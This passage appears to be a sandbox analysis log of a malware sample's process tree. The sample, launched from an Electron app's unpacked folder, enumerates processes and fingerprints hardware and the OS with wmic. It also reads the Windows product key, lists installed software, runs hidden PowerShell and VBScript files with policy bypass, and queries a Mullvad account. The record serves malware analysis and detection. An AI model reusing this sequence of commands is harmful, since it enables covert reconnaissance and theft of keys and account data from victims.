  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:2432
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:8120
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:2772
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7956
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5044
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7824
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:1020
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:8020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:2552
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7452
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:920
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:7608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4892
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8228
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5100
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7996
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3240
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8376
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4764
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7964
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:2692
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7908
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4736
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7832
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:700
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8048
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3000
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:7840
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5124
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8284
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5144
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7468
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5160
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:8112
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5172
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7528
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5180
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8292
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5200
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:7760
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5224
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7312
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5244
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8188
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5256
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:7804
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:5268
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    PID:8132
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "net session"
  2⤵
  PID:5284
- - C:\Windows\system32\net.exe
    net session
    3⤵
    PID:8220
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 session
      4⤵
      PID:9064
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Temp\resources\app.asar.unpacked\bind\main.exe"
  2⤵
  PID:5308
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
  2⤵
  PID:5332
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic csproduct get uuid
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:7460
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption, osarchitecture | more +1"
  2⤵
  PID:5352
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic OS get caption, osarchitecture
    3⤵
    PID:7752
- - C:\Windows\system32\more.com
    more +1
    3⤵
    PID:8732
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name | more +1"
  2⤵
  PID:10928
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get name
    3⤵
    PID:10968
- - C:\Windows\system32\more.com
    more +1
    3⤵
    PID:10976
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController get name | more +1"
  2⤵
  PID:11020
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic PATH Win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:11060
- - C:\Windows\system32\more.com
    more +1
    3⤵
    PID:11068
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
  2⤵
  PID:11112
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:11152
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName"
  2⤵
  PID:8036
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4160
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:10964
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:11016
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=NaN get ExecutablePath"
  2⤵
  PID:11196
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic process where processid=NaN get ExecutablePath
    3⤵
    PID:9772
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""
  2⤵
  PID:10176
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
    3⤵
    PID:10248
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""
  2⤵
  PID:10980
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
    3⤵
    PID:9192
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip""
  2⤵
  PID:6084
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip"
    3⤵
    PID:10984
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook""
  2⤵
  PID:1440
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook"
    3⤵
    PID:3516
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager""
  2⤵
  PID:7044
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"
    3⤵
    PID:6500
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx""
  2⤵
  PID:8184
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx"
    3⤵
    PID:2476
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime""
  2⤵
  PID:8136
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime"
    3⤵
    PID:5648
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore""
  2⤵
  PID:1556
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore"
    3⤵
    PID:3532
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40""
  2⤵
  PID:9700
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40"
    3⤵
    PID:6404
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data""
  2⤵
  PID:7048
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:7768
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data"
    3⤵
    PID:9868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX""
  2⤵
  PID:788
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX"
    3⤵
    PID:9640
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData""
  2⤵
  PID:8524
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData"
    3⤵
    PID:6172
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack""
  2⤵
  PID:9308
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack"
    3⤵
    PID:6572
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 105.0.3 (x64 en-US)""
  2⤵
  PID:5400
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 105.0.3 (x64 en-US)"
    3⤵
    PID:5092
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService""
  2⤵
  PID:10412
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService"
    3⤵
    PID:10404
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2""
  2⤵
  PID:10400
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2"
    3⤵
    PID:10472
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us""
  2⤵
  PID:1676
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us"
    3⤵
    PID:10416
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent""
  2⤵
  PID:9720
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent"
    3⤵
    PID:10104
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player""
  2⤵
  PID:8696
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:8048
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player"
    3⤵
    PID:5576
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC""
  2⤵
  PID:6040
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC"
    3⤵
    PID:9204
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{113C0ADC-B9BD-4F95-9653-4F5BC540ED03}""
  2⤵
  PID:9264
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{113C0ADC-B9BD-4F95-9653-4F5BC540ED03}"
    3⤵
    PID:6080
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}""
  2⤵
  PID:6068
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}"
    3⤵
    PID:1484
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3544B2EE-E62F-4D11-B79C-3DDEACE94DA5}""
  2⤵
  PID:8516
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3544B2EE-E62F-4D11-B79C-3DDEACE94DA5}"
    3⤵
    PID:6628
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}""
  2⤵
  PID:11236
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}"
    3⤵
    PID:6840
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A706840-2882-423C-90EB-B31545E2BC7A}""
  2⤵
  PID:6364
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A706840-2882-423C-90EB-B31545E2BC7A}"
    3⤵
    PID:9736
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}""
  2⤵
  PID:8068
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}"
    3⤵
    PID:9884
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}""
  2⤵
  PID:6956
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}"
    3⤵
    PID:5896
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}""
  2⤵
  PID:8152
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}"
    3⤵
    PID:6648
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}""
  2⤵
  PID:5064
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}"
    3⤵
    PID:11252
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}""
  2⤵
  PID:5068
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}"
    3⤵
    PID:9744
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{76DEEAB3-122F-4231-83C7-0C35363D02F9}""
  2⤵
  PID:9280
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{76DEEAB3-122F-4231-83C7-0C35363D02F9}"
    3⤵
    PID:7804
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{77924AE4-039E-4CA4-87B4-2F64180381F0}""
  2⤵
  PID:6032
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{77924AE4-039E-4CA4-87B4-2F64180381F0}"
    3⤵
    PID:5756
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}""
  2⤵
  PID:8564
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}"
    3⤵
    PID:5912
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}""
  2⤵
  PID:7400
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}"
    3⤵
    PID:1544
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}""
  2⤵
  PID:6816
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}"
    3⤵
    PID:9104
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AE86D888-1404-47CC-A7BB-8D86C0503E58}""
  2⤵
  PID:9756
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AE86D888-1404-47CC-A7BB-8D86C0503E58}"
    3⤵
    PID:8348
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7141A99-592B-4226-A4E9-B767C1D0FBAF}""
  2⤵
  PID:7124
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7141A99-592B-4226-A4E9-B767C1D0FBAF}"
    3⤵
    PID:7480
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}""
  2⤵
  PID:1408
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}"
    3⤵
    PID:1324
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}""
  2⤵
  PID:2600
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}"
    3⤵
    PID:4172
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D44822A8-FC28-42FC-8B1D-21A78579FC79}""
  2⤵
  PID:3772
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D44822A8-FC28-42FC-8B1D-21A78579FC79}"
    3⤵
    PID:9488
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E016F2B9-01FE-4FAA-882E-ECC43FA49751}""
  2⤵
  PID:8504
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E016F2B9-01FE-4FAA-882E-ECC43FA49751}"
    3⤵
    PID:6960
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\SfwJhlxBXKhO_tezmp.ps1""
  2⤵
  PID:5916
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\SfwJhlxBXKhO_tezmp.ps1"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:9784
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "cscript C:\Users\Admin\AppData\Roaming\7qvSgvGYECFZ.vbs"
  2⤵
  PID:6768
- - C:\Windows\system32\cscript.exe
    cscript C:\Users\Admin\AppData\Roaming\7qvSgvGYECFZ.vbs
    3⤵
    PID:7056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "mullvad account get"
  2⤵
  PID:4376
- C:\Windows\system32\cmd.exe
